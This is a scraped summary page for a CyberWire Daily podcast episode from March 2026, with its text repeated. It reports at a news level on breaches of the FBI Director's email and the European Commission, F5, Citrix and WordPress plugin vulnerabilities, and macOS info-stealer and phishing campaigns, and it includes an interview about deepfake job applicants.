CyberWire Daily – "Inbox Intrusion Hits FBI Chief"

Date: March 30, 2026 | Host: Dave Bittner (N2K Networks)

Episode Overview

This episode dives into a series of headline cybersecurity incidents, including a breach affecting the FBI Director's personal email, a large-scale cyberattack on the European Commission, and multiple high-severity vulnerabilities impacting enterprises globally. A featured Industry Insights interview with Brian Long, CEO & Co-Founder of Adaptive Security, highlights the alarming trend of deepfake job applicants and the evolving threat to organizational identity security.

Key News Stories & Discussion Points

1. Iranian-Linked Hackers Breach FBI Director's Email

[02:07]

Hackers identifying as Handela Hack Team claim to have breached FBI Director Kash Patel's personal Gmail, leaking photos and over 300 emails.
The FBI confirmed the account was targeted but stated the material was historical and irrelevant to government operations.
Handela has ties to Iranian cyber intelligence and is known for attacks aimed at embarrassing U.S. officials amid rising geopolitical tensions.
Insight: This fits a broader Iranian strategy of using cyber intrusions as low-level retaliatory pressure and signaling capability.

"Analysts say the Patel leak fits a broader Iranian strategy to embarrass U.S. officials and signal reach during ongoing tensions..."
— Dave Bittner [03:22]

2. Shiny Hunters Hit European Commission

[04:09]

The criminal extortion group Shiny Hunters claim responsibility for breaching the European Commission's Europa.eu web platform.
An AWS account associated with the platform was compromised—public sites remained online, but sensitive data exposure is suspected.
Shiny Hunters allege theft of 350+ GB of files and have leaked a 90GB archive.
Officials are assessing the incident, notifying potentially affected organizations, and ramping up security.

3. Critical Vulnerabilities in F5 and Citrix

[05:15]

F5: Newly elevated vulnerability in Big IP Access Policy Manager allows remote code execution. Over 240,000 exposed systems are at risk, with active exploitation confirmed.
Citrix NetScaler Gateway: A flaw enables memory data leaks via SAML requests. Attacks began soon after vulnerability disclosure, prompting urgent patching.
CISA and UK’s NCSC have instructed immediate remediation efforts.

4. WordPress Plugin Exposes Hundreds of Thousands of Sites

[06:28]

The "Smart Slider 3" plugin, installed on 800,000+ sites, allows authenticated subscriber-level users to read arbitrary files (e.g., configuration details and credentials).
Rated medium risk, but the scale and reach heighten urgency for administrators.

5. Infinity Stealer Malware Targets macOS

[07:20]

A new info-stealer, Infinity Stealer, is delivered via fake Cloudflare CAPTCHA pages using sophisticated social engineering.
Victims are tricked into running a base64-encoded curl command, leading to Python-based native macOS malware.
Notably combines new delivery (“ClickFix”) and compile techniques for evasion.

6. Russian APT "Star Blizzard" Adopts Dark Sword iOS Exploit Kit

[08:31]

Star Blizzard is targeting Apple devices and iCloud accounts with link-based phishing disguised as Atlantic Council communications.
Focuses on credential harvesting and intelligence collection, now covering government, legal, financial, academic, and think tank sectors.

7. U.S. Treasury Considers Cyber Insurance Backstop

[09:22]

Treasury is reevaluating whether catastrophic cyber incidents should be classified as terrorism under the Terrorism Risk Insurance Program (TRIP).
Attribution and intent challenges make cyber hard to fit under existing TRIP guidelines.
Concern is rising over private insurance capacity to cover losses from potentially systemic cyber events (e.g., nationwide outages).

8. DHS Closes Investigation into CISA Staff

[10:37]

Seven CISA staff placed on leave over a failed counterintelligence polygraph related to then-acting SISA Director have been cleared of wrongdoing.
Lawmakers call this a “correction” affirming staff acted within their duties.

Industry Insights: Interview with Brian Long, CEO & Co-Founder, Adaptive Security

Topic: Deepfake Job Hires & the New Identity Attack Surface
[14:26–22:36]

The Impersonation Epidemic

How Deepfake Job Applicants Are Changing Insider Risk

Deepfakes + Social Profiling: Attackers use public data (LinkedIn, data brokers, company org charts) to convincingly impersonate real individuals—voice, visuals, employment history.
Accessibility & Cost: “Anyone from an 8 year old to an 80 year old” can now engineer such attacks affordably.

"They can have a very coherent conversation with you that really... gets to the point and can get past a lot of your typical controls."
— Brian Long [14:29]
Remote Work Enables Attacks: Many companies never physically meet new hires for remote roles, opening the door for fake applicants to secure access to sensitive systems.

"Gartner estimates that by 2028, one in four job applicants will be impersonation applicants... almost 25% of applicants will not be real people."
— Brian Long [16:39]

Why Attackers Do It

Gaining Employee Access: Once ‘hired,’ attackers may deploy ransomware, exfiltrate data, or act as sleeper agents for more insidious espionage.
Tenure varies: Some attackers only need a day; others may persist for years.

Mitigations and Recommendations

Awareness: Most non-security staff find the concept of fake applicants “insane”—first step is education throughout the workforce.
In-Person Verification: Mandate face-to-face onboarding—even for remote positions—to verify identity with documents and basic employment background checks.

"You should not be hiring someone if you have not met them in real life, and when you meet them... verify it's really them."
— Brian Long [19:33]
Access Controls: Move toward least privilege and segment access by job function to reduce risk when incidents do slip through.
Organizations at Risk: Large enterprises are adopting new controls and tools quickly, but mid-market firms (100–10,000 employees) are “not ready for this at all.”
Getting Started: Free training materials are available for all ages and organizational roles at Adaptive Security's website for education and onboarding assistance.

"Learn the basics... if you want to roll things out customized to your organization, you can sign up to get a demo."
— Brian Long [22:01]

Memorable Quotes

On the new attack surface:

"AI has made insider risk really redefined to be a risk around deepfakes and impersonation job applicants and ultimately people applying to jobs... who may not exist at all."
— Brian Long [15:45]
On the scale of the threat:

"Once they get the job, they get access to all the systems, then they can cause all sorts of havoc."
— Brian Long [16:39]
On education:

"The average person finds this to be totally insane... that someone's going to impersonate someone else to get a remote job at their company..."
— Brian Long [19:33]

Critical Segment Timestamps

[02:07] – FBI Director's email breach details
[04:09] – European Commission and Shiny Hunters breach
[05:15] – F5 and Citrix vulnerabilities
[06:28] – WordPress plugin vulnerability details
[07:20] – Infinity Stealer malware analysis
[08:31] – Russian APT Star Blizzard's new iOS campaign
[09:22] – U.S. Treasury on cyber insurance backstop
[10:37] – DHS clears CISA staff in polygraph probe
[14:26–22:36] – Brian Long on deepfake job hires & solutions

Final Commentary: Bureaucratic Black Box Warnings

[22:44]

A 2024 review of Microsoft’s Government Community Cloud High revealed ongoing visibility issues. Despite missing documentation, the product was authorized with “proceed with caution” advice, prompting critics to label approval as “paperwork theater.” The incident underscores the growing risks of black box technologies in critical infrastructure.

This episode delivers a sobering look at the rapid evolution of cyber threats—from geopolitical hacking campaigns to the new era of identity attacks driven by AI and deepfakes. Key takeaways stress the urgent need for awareness, smarter identity controls, and holistic security postures, especially among mid-sized enterprises.

To explore in-depth resources or access free trainings on identity security:
AdaptiveSecurity.com

(Summary excludes advertisements, show intros/outros, and non-content sections.)

CyberWire Daily – "Inbox Intrusion Hits FBI Chief"

Date: March 30, 2026 | Host: Dave Bittner (N2K Networks)

Episode Overview

Key News Stories & Discussion Points

1. Iranian-Linked Hackers Breach FBI Director's Email

[02:07]

Hackers identifying as Handela Hack Team claim to have breached FBI Director Kash Patel's personal Gmail, leaking photos and over 300 emails.
The FBI confirmed the account was targeted but stated the material was historical and irrelevant to government operations.
Handela has ties to Iranian cyber intelligence and is known for attacks aimed at embarrassing U.S. officials amid rising geopolitical tensions.
Insight: This fits a broader Iranian strategy of using cyber intrusions as low-level retaliatory pressure and signaling capability.

"Analysts say the Patel leak fits a broader Iranian strategy to embarrass U.S. officials and signal reach during ongoing tensions..."
— Dave Bittner [03:22]

2. Shiny Hunters Hit European Commission

[04:09]

The criminal extortion group Shiny Hunters claim responsibility for breaching the European Commission's Europa.eu web platform.
An AWS account associated with the platform was compromised—public sites remained online, but sensitive data exposure is suspected.
Shiny Hunters allege theft of 350+ GB of files and have leaked a 90GB archive.
Officials are assessing the incident, notifying potentially affected organizations, and ramping up security.

3. Critical Vulnerabilities in F5 and Citrix

[05:15]

F5: Newly elevated vulnerability in Big IP Access Policy Manager allows remote code execution. Over 240,000 exposed systems are at risk, with active exploitation confirmed.
Citrix NetScaler Gateway: A flaw enables memory data leaks via SAML requests. Attacks began soon after vulnerability disclosure, prompting urgent patching.
CISA and UK’s NCSC have instructed immediate remediation efforts.

4. WordPress Plugin Exposes Hundreds of Thousands of Sites

[06:28]

The "Smart Slider 3" plugin, installed on 800,000+ sites, allows authenticated subscriber-level users to read arbitrary files (e.g., configuration details and credentials).
Rated medium risk, but the scale and reach heighten urgency for administrators.

5. Infinity Stealer Malware Targets macOS

[07:20]

A new info-stealer, Infinity Stealer, is delivered via fake Cloudflare CAPTCHA pages using sophisticated social engineering.
Victims are tricked into running a base64-encoded curl command, leading to Python-based native macOS malware.
Notably combines new delivery (“ClickFix”) and compile techniques for evasion.

6. Russian APT "Star Blizzard" Adopts Dark Sword iOS Exploit Kit

[08:31]

Star Blizzard is targeting Apple devices and iCloud accounts with link-based phishing disguised as Atlantic Council communications.
Focuses on credential harvesting and intelligence collection, now covering government, legal, financial, academic, and think tank sectors.

7. U.S. Treasury Considers Cyber Insurance Backstop

[09:22]

Treasury is reevaluating whether catastrophic cyber incidents should be classified as terrorism under the Terrorism Risk Insurance Program (TRIP).
Attribution and intent challenges make cyber hard to fit under existing TRIP guidelines.
Concern is rising over private insurance capacity to cover losses from potentially systemic cyber events (e.g., nationwide outages).

8. DHS Closes Investigation into CISA Staff

[10:37]

Seven CISA staff placed on leave over a failed counterintelligence polygraph related to then-acting SISA Director have been cleared of wrongdoing.
Lawmakers call this a “correction” affirming staff acted within their duties.

Industry Insights: Interview with Brian Long, CEO & Co-Founder, Adaptive Security

Topic: Deepfake Job Hires & the New Identity Attack Surface
[14:26–22:36]

The Impersonation Epidemic

How Deepfake Job Applicants Are Changing Insider Risk

Deepfakes + Social Profiling: Attackers use public data (LinkedIn, data brokers, company org charts) to convincingly impersonate real individuals—voice, visuals, employment history.
Accessibility & Cost: “Anyone from an 8 year old to an 80 year old” can now engineer such attacks affordably.

"They can have a very coherent conversation with you that really... gets to the point and can get past a lot of your typical controls."
— Brian Long [14:29]
Remote Work Enables Attacks: Many companies never physically meet new hires for remote roles, opening the door for fake applicants to secure access to sensitive systems.

"Gartner estimates that by 2028, one in four job applicants will be impersonation applicants... almost 25% of applicants will not be real people."
— Brian Long [16:39]

Why Attackers Do It

Gaining Employee Access: Once ‘hired,’ attackers may deploy ransomware, exfiltrate data, or act as sleeper agents for more insidious espionage.
Tenure varies: Some attackers only need a day; others may persist for years.

Mitigations and Recommendations

Awareness: Most non-security staff find the concept of fake applicants “insane”—first step is education throughout the workforce.
In-Person Verification: Mandate face-to-face onboarding—even for remote positions—to verify identity with documents and basic employment background checks.

"You should not be hiring someone if you have not met them in real life, and when you meet them... verify it's really them."
— Brian Long [19:33]
Access Controls: Move toward least privilege and segment access by job function to reduce risk when incidents do slip through.
Organizations at Risk: Large enterprises are adopting new controls and tools quickly, but mid-market firms (100–10,000 employees) are “not ready for this at all.”
Getting Started: Free training materials are available for all ages and organizational roles at Adaptive Security's website for education and onboarding assistance.

"Learn the basics... if you want to roll things out customized to your organization, you can sign up to get a demo."
— Brian Long [22:01]

Memorable Quotes

On the new attack surface:

"AI has made insider risk really redefined to be a risk around deepfakes and impersonation job applicants and ultimately people applying to jobs... who may not exist at all."
— Brian Long [15:45]
On the scale of the threat:

"Once they get the job, they get access to all the systems, then they can cause all sorts of havoc."
— Brian Long [16:39]
On education:

"The average person finds this to be totally insane... that someone's going to impersonate someone else to get a remote job at their company..."
— Brian Long [19:33]

Critical Segment Timestamps

[02:07] – FBI Director's email breach details
[04:09] – European Commission and Shiny Hunters breach
[05:15] – F5 and Citrix vulnerabilities
[06:28] – WordPress plugin vulnerability details
[07:20] – Infinity Stealer malware analysis
[08:31] – Russian APT Star Blizzard's new iOS campaign
[09:22] – U.S. Treasury on cyber insurance backstop
[10:37] – DHS clears CISA staff in polygraph probe
[14:26–22:36] – Brian Long on deepfake job hires & solutions

Final Commentary: Bureaucratic Black Box Warnings

[22:44]

A 2024 review of Microsoft’s Government Community Cloud High revealed ongoing visibility issues. Despite missing documentation, the product was authorized with “proceed with caution” advice, prompting critics to label approval as “paperwork theater.” The incident underscores the growing risks of black box technologies in critical infrastructure.

To explore in-depth resources or access free trainings on identity security:
AdaptiveSecurity.com

(Summary excludes advertisements, show intros/outros, and non-content sections.)

Inbox intrusion hits FBI chief.

Summary

CyberWire Daily – "Inbox Intrusion Hits FBI Chief"

Episode Overview

Key News Stories & Discussion Points

1. Iranian-Linked Hackers Breach FBI Director's Email

2. Shiny Hunters Hit European Commission

3. Critical Vulnerabilities in F5 and Citrix

4. WordPress Plugin Exposes Hundreds of Thousands of Sites

5. Infinity Stealer Malware Targets macOS

6. Russian APT "Star Blizzard" Adopts Dark Sword iOS Exploit Kit

7. U.S. Treasury Considers Cyber Insurance Backstop

8. DHS Closes Investigation into CISA Staff

Industry Insights: Interview with Brian Long, CEO & Co-Founder, Adaptive Security

The Impersonation Epidemic

How Deepfake Job Applicants Are Changing Insider Risk

Why Attackers Do It

Mitigations and Recommendations

Memorable Quotes

Critical Segment Timestamps

Final Commentary: Bureaucratic Black Box Warnings

Summary

CyberWire Daily – "Inbox Intrusion Hits FBI Chief"

Episode Overview

Key News Stories & Discussion Points

1. Iranian-Linked Hackers Breach FBI Director's Email

2. Shiny Hunters Hit European Commission

3. Critical Vulnerabilities in F5 and Citrix

4. WordPress Plugin Exposes Hundreds of Thousands of Sites

5. Infinity Stealer Malware Targets macOS

6. Russian APT "Star Blizzard" Adopts Dark Sword iOS Exploit Kit

7. U.S. Treasury Considers Cyber Insurance Backstop

8. DHS Closes Investigation into CISA Staff

Industry Insights: Interview with Brian Long, CEO & Co-Founder, Adaptive Security

The Impersonation Epidemic

How Deepfake Job Applicants Are Changing Insider Risk

Why Attackers Do It

Mitigations and Recommendations

Memorable Quotes

Critical Segment Timestamps

Final Commentary: Bureaucratic Black Box Warnings